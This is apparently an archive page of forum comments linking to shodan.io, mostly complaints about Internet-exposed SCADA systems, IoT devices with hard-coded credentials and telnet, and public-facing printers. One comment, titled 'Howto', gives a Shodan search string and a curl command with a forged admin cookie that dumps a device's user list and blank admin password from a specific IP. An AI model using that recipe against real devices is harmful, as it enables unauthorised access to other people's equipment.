Domain: shodan.io
Stories and comments across the archive that link to shodan.io.
Comments · 6
-
Well ...
-
Re:'Someone'?
You mean shodan.io
-
Howto
Since the article is light on actual details of how to find vulnerable machines.
Go to shodan.io and search for '<A HREF="/login.rsp">'
Replace the IP 14.63.122.219:9000 in the example with one from Shodan's results.
$ curl "http://14.63.122.219:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
{"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]} -
Why is any SCADA system still Internet-accessible?
I remember hearing the SCADA and industrial hacking news as far back as early 2000's from when I got into the tech world, and even then, always the same take-away: Why are these systems even accessible outside the intranet they exist on? I'd even take it a step further and wonder why there isn't much tamer form of a secured, air gap datacenter approach to this? Anyone who's done or worked with building automation systems or even went to a tech school for SCADA operation knows this shit doesn't have to exist and be set up that way.
I actually wondered what the hit-rate of SCADA attacks was, and I had no idea there was an online database of them that goes way back into the early 90's. And exposure to the internet is harder to hide from, shoot, most don't even have to try if they are using Shodan.
I think that's the real issue and always has been. That really-old-Windows-OS-and-the-word-crypto-buzzword phrasing is just a tech journalism shock-jock plug to lighten the heat from the real problem.
-
Hard coded creds AND telnet as a service? Plz
So hard-coded credentials AND MF telnet? Seriously ladies and gentlemen, WTF is slapping the OS stack on these IoT devices? Was someone just that lazy with their firmware we couldn't take that out of busybox/toybox or heaven forbid strip that out of the development pipeline when you're cutting out the production firmware for mass use? I realize it's handy when you're developing it, but this is just lunacy anymore. I thought we all went over this as hardened, grey sys-admins now that telnet had died a long time ago in the 90's...
I don't even think I want to get started about hard-coded credentials, and I'm not going to. All I can say now is: Thanks for making it unbelievably EASY for anyone putting yet another bot network to compromise more low hanging fruit. Even if it's not used in that, I'm sure all the Shodan fans will love it.
I'm just whine-ranting now, but is anyone has F blown away as me that shit like this STILL continues to happen?
-
Re:Printer with public internet ip? why?
>only a brute force scan of the net for addresses with an open port 9100
Still giving him too much credit. Probably just searched in Shodan for those addresses.